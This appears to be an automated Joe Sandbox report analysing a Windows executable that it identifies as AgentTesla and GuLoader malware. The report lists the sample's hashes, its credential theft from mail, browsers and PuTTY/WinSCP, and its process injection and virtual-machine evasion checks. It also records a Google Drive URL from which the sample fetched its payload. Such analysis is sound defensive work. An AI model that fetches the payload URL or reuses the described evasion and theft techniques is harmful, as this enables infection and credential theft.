Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rJUSTIFICANTEDEPAGO.exe

Overview

General Information

Sample Name:rJUSTIFICANTEDEPAGO.exe
Analysis ID:830400
MD5:e542cf9ce8a67a5b681cc9b0004e0b10
SHA1:40161158f7cab76c57b4d95798c74ebc7d612cfe
SHA256:4e78f6957f4c8c0f56a9b49e139342b1df7b1dc05518d96e776aa687a80f8c58
Infos:

Detection

AgentTesla, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • rJUSTIFICANTEDEPAGO.exe (PID: 4708 cmdline: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe MD5: E542CF9CE8A67A5B681CC9B0004E0B10)
    • CasPol.exe (PID: 4160 cmdline: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.2804076292.0000000005376000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: CasPol.exe PID: 4160JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 4160JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: rJUSTIFICANTEDEPAGO.exeVirustotal: Detection: 21%Perma Link
            Source: rJUSTIFICANTEDEPAGO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Replyingly\Avnbgen\SpisekamrenesJump to behavior
            Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.11.20:49816 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49817 version: TLS 1.2
            Source: rJUSTIFICANTEDEPAGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040596D
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_004065A2 FindFirstFileW,FindClose,2_2_004065A2
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3l1utm86tkghdjh82fk6qcfges/1679307750000/00651307112604445902/*/1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW?e=download&uuid=ea605c4e-1574-48ab-a781-ae85f09da2da HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-98-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000007.00000003.2773592501.0000000005510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000007.00000003.2773592501.0000000005510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmp, rJUSTIFICANTEDEPAGO.exe, 00000002.00000000.1680795427.000000000040A000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000007.00000002.6872352349.0000000005508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-98-docs.googleusercontent.com/%%doc-0s-98-docs.googleusercontent.com
            Source: CasPol.exe, 00000007.00000003.2773592501.0000000005510000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6872352349.00000000054F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6872352349.000000000554E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0s-98-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3l
            Source: CasPol.exe, 00000007.00000002.6888996138.0000000034FA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/dotnet/runtime
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/dotnet/runtimeBSJB
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/npt87m3l1utm86tkghdjh82fk6qcfges/1679307750000/00651307112604445902/*/1Ll5Auv3nDnZ4O0Qt2f2ZcFUknFi4BgKW?e=download&uuid=ea605c4e-1574-48ab-a781-ae85f09da2da HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0s-98-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.11.20:49816 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49817 version: TLS 1.2
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00405402 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00405402
            Source: rJUSTIFICANTEDEPAGO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403350
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00404C3F2_2_00404C3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_360A41407_2_360A4140
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_360A4D587_2_360A4D58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 7_2_360A44887_2_360A4488
            Source: System.Reflection.TypeExtensions.dll.2.drStatic PE information: No import functions for PE file found
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: rJUSTIFICANTEDEPAGO.exeStatic PE information: invalid certificate
            Source: rJUSTIFICANTEDEPAGO.exeVirustotal: Detection: 21%
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile read: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeJump to behavior
            Source: rJUSTIFICANTEDEPAGO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeJump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile created: C:\Users\user\AppData\Local\Temp\nsz625B.tmpJump to behavior
            Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@4/14@2/2
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_004020FE LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,2_2_004020FE
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_004046C3 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004046C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Replyingly\Avnbgen\SpisekamrenesJump to behavior
            Source: rJUSTIFICANTEDEPAGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.2804076292.0000000005376000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_10002DE0 push eax; ret 2_2_10002E0E
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
            Source: System.Reflection.Primitives.dll.2.drStatic PE information: 0xE40AD0DE [Wed Mar 28 09:54:38 2091 UTC]
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile created: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\AdvSplash.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile created: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Rntgenstraaler\Overholde\Wingdings\System.Reflection.TypeExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile created: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nonteachable\Bekmpelsesforanstaltninger\Carcinoid2\Efterplaprer\System.Reflection.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile created: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2802808162.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2802808162.0000000000858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Rntgenstraaler\Overholde\Wingdings\System.Reflection.TypeExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Nonteachable\Bekmpelsesforanstaltninger\Carcinoid2\Efterplaprer\System.Reflection.Primitives.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 1885Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040596D
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_004065A2 FindFirstFileW,FindClose,2_2_004065A2
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeAPI call chain: ExitProcess graph end nodegraph_2-4655
            Source: C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exeAPI call chain: ExitProcess graph end nodegraph_2-4660
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: rJUSTIFICANTEDEPAGO.exe, 00000002.00000002.2886151117.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000007.00000002.6876893530.00000000070F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
